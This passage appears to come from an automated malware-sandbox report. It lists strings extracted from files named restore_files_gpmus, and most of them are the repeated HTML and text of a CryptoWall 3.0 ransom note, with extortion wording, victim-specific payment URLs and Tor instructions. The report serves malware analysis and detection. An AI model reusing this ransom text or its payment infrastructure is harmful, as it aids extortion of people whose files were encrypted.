target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt185.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt45.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt421.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html191.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt18.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html123.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt206.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html349.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html411.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html215.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt102.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html410.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt154.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html153.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt258.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt172.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt392.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html70.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt276.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html103.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html272.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html259.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt58.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt165.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt414.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html130.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time 